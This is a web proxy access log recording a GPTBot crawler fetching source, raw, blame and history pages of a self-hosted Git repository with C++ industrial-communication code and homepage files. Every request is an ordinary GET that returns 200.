"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13524] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13524] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11207] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15357] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12792] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10943] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:16:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:16:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15357] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot" [Client 74.7.227.38] [Length 9762] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:16:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16098] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16096] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10181] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10478] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10181] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20005] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12302] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12302] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor" [Client 74.7.227.38] [Length 14753] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:16:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 48281] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30473] [Gzip 11.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 409932] [Gzip 15.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 97360] [Gzip 18.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 14123] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:16:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:16:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13336] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 